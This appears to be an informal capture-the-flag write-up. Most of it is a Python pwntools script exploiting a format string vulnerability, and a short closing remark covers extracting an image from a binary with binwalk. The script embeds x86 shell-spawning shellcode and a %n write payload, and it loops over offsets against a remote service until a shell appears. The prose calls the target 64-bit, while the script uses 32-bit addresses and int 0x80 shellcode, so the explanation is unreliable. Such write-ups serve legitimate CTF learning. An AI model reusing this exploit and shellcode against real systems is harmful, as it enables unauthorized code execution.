Sharifctf
It had format string vuln and we had to dump wholwe stack and find the flag in it so i wrote a Brute-force in python using Direct parameter access .
But twist here is It is 64 bit binary so u have to use $lx instead of $x ..
from pwn import *
shellcode="\x90"*10+"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"+"\x90"*10
i=8
while True:
try:
num = 0xccec+i
num1= num - 78
num2 = 0xffff - num
r=remote('localhost',56032)
#r=remote('challenge02.root-me.org',56032)
payload = pack(0x0804a04c)+pack(0x0804a04e)+shellcode+"%"+str(num1)+"u"+"%5$n"+"%"+str(num2)+"u"+"%6$n"
print payload
r.sendline(payload)
#r.interactive()
msg=r.recv(1024,timeout = 10)
print msg
except EOFError :
print "[+] No shell!"
print "[+]i="+str(i)
i=i+1
Basically it had a binary which when running displays a image our aim is to find camera model of that image but how to extract it ???
I analysed it using Binwalk but it showed only elf and zlib data ... but it fooled me if u extract it using -e option in binwalk u get the image ...